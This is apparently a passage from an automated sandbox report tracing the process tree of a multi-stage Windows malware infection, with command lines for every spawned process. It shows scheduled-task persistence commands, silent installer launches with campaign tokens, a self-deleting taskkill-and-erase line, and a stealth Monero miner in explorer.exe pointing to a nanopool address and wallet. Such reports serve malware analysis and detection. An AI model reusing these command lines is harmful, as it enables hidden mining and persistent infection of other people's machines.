                                                                                                                                                          findstr /V /R "^JdxmflaMoKJKGKEonRKIDlCuNBztuuxobvTVXbusdtKZTUcnQFZrvdHmOhLNQgGwfAjlQJkqLaammCjTuVhBisMuOxuJLaA$" Attesa.vsdx
                                                                                                                                                          12⤵
                                                                                                                                                            PID:8164
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                            Impedire.exe.com I
                                                                                                                                                            12⤵
                                                                                                                                                              PID:7320
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                13⤵
                                                                                                                                                                  PID:8300
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                    14⤵
                                                                                                                                                                      PID:8500
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                        15⤵
                                                                                                                                                                          PID:8812
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                            16⤵
                                                                                                                                                                              PID:9128
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                17⤵
                                                                                                                                                                                  PID:5900
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                    18⤵
                                                                                                                                                                                      PID:8304
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                        19⤵
                                                                                                                                                                                          PID:8624
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Impedire.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Impedire.exe.com I
                                                                                                                                                                                            20⤵
                                                                                                                                                                                              PID:7608
                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                              ping localhost
                                                                                                                                                                              12⤵
                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                              PID:2504
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\foradvertising.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" /wws1
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:4308
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "foradvertising.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\foradvertising.exe" & exit
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:8300
                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                taskkill /im "foradvertising.exe" /f
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                PID:4916
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\gdgame.exe"
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:7652
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\gdgame.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\gdgame.exe" -a
                                                                                                                                                                                10⤵
                                                                                                                                                                                  PID:6884
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:7628
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:3972
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-UG8KQ.tmp\IBInstaller_74449.tmp
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-UG8KQ.tmp\IBInstaller_74449.tmp" /SL5="$50662,14713126,721408,C:\Users\Admin\AppData\Local\Temp\IBInstaller_74449.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
                                                                                                                                                                                      10⤵
                                                                                                                                                                                        PID:9016
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-GGF19.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                                                                                                          11⤵
                                                                                                                                                                                            PID:6076
                                                                                                                                                                                            • C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                              expand C:\Users\Admin\AppData\Local\Temp\is-GGF19.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                                                                                                              12⤵
                                                                                                                                                                                                PID:8636
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Thu214aaca5625.exe
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:1568
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu214aaca5625.exe
                                                                                                                                                                                  Thu214aaca5625.exe
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:3392
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-0DB9C.tmp\Thu214aaca5625.tmp
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-0DB9C.tmp\Thu214aaca5625.tmp" /SL5="$70062,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu214aaca5625.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    PID:4188
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-5OCR7.tmp\46807GHF____.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-5OCR7.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      PID:4680
                                                                                                                                                                                      • C:\Program Files\Windows Mail\LLMLOGWYYX\ultramediaburner.exe
                                                                                                                                                                                        "C:\Program Files\Windows Mail\LLMLOGWYYX\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:1348
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-4SHBS.tmp\ultramediaburner.tmp
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-4SHBS.tmp\ultramediaburner.tmp" /SL5="$30388,281924,62464,C:\Program Files\Windows Mail\LLMLOGWYYX\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            PID:5084
                                                                                                                                                                                            • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                                                              "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                              10⤵
                                                                                                                                                                                                PID:4928
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\37-61690-e23-596ba-3a9566b9afdfd\Cuhikyvazhy.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\37-61690-e23-596ba-3a9566b9afdfd\Cuhikyvazhy.exe"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:6788
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a3-fcf00-232-fe984-5949cfae54c9f\Kumonaxazha.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a3-fcf00-232-fe984-5949cfae54c9f\Kumonaxazha.exe"
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:6416
                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wix0x3k5.jft\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:7488
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wix0x3k5.jft\GcleanerEU.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wix0x3k5.jft\GcleanerEU.exe /eufive
                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                        PID:7320
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 652
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:7476
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 684
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:5820
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 768
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:7920
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 800
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:5748
                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 880
                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                          PID:8184
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mi1qspyp.424\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:7644
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\mi1qspyp.424\installer.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\mi1qspyp.424\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:6040
                                                                                                                                                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\mi1qspyp.424\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\mi1qspyp.424\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1630973246 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:8568
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v5fot5ze.n5y\anyname.exe & exit
                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                              PID:7932
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\v5fot5ze.n5y\anyname.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\v5fot5ze.n5y\anyname.exe
                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                  PID:7564
                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fp5n2d1p.5bw\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:8116
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\fp5n2d1p.5bw\gcleaner.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\fp5n2d1p.5bw\gcleaner.exe /mixfive
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:6092
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wtewf4rq.5y0\autosubplayer.exe /S & exit
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:7200
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c Thu2102ff6cfe07c.exe
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:2220
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu2102ff6cfe07c.exe
                                                                                                                                                                                                                Thu2102ff6cfe07c.exe
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                PID:1820
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c Thu21568b0ab8.exe
                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                PID:1832
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC4F79C54\Thu21568b0ab8.exe
                                                                                                                                                                                                                  Thu21568b0ab8.exe
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                  PID:2284
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                    PID:4544
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      PID:5060
                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:6900
                                                                                                                                                                                                                          • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                                            PID:6848
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                            PID:6712
                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                PID:5296
                                                                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                  schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:1820
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                PID:1952
                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                  PID:4472
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:4104
                                                                                                                                                                                                                              • C:\ProgramData\3670352.exe
                                                                                                                                                                                                                                "C:\ProgramData\3670352.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:5508
                                                                                                                                                                                                                              • C:\ProgramData\5563000.exe
                                                                                                                                                                                                                                "C:\ProgramData\5563000.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                PID:5628
                                                                                                                                                                                                                              • C:\ProgramData\7805307.exe
                                                                                                                                                                                                                                "C:\ProgramData\7805307.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                PID:6136
                                                                                                                                                                                                                              • C:\ProgramData\4738755.exe
                                                                                                                                                                                                                                "C:\ProgramData\4738755.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:4808
                                                                                                                                                                                                                              • C:\ProgramData\8805672.exe
                                                                                                                                                                                                                                "C:\ProgramData\8805672.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                PID:4860
                                                                                                                                                                                                                              • C:\ProgramData\3040261.exe
                                                                                                                                                                                                                                "C:\ProgramData\3040261.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:5888
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\2.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\2.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:4340
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                PID:5436
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:2256
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 688
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:5732
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 840
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:5400
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 856
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:5112
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 900
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:6112
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1096
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:5828
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 1064
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                PID:5720
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2256 -s 996
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:6320
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4384
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\DVORAK.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\DVORAK.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                              PID:4540
                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -u -p 4540 -s 1524
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Program crash
                                                                                                                                                                                                                                PID:5956
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                              PID:4648
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-RLM2D.tmp\setup_2.tmp
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-RLM2D.tmp\setup_2.tmp" /SL5="$20272,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:4832
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                    PID:5320
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-8ULMF.tmp\setup_2.tmp
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-8ULMF.tmp\setup_2.tmp" /SL5="$302F4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      PID:5488
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:4860
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    PID:5640
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:4288
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                  PID:5124
                                                                                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                      PID:3564
                                                                                                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                                        PID:5200
                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                                      PID:5552
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:5720
                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:1796
                                                                                                                                                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:6244
                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            PID:6536
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
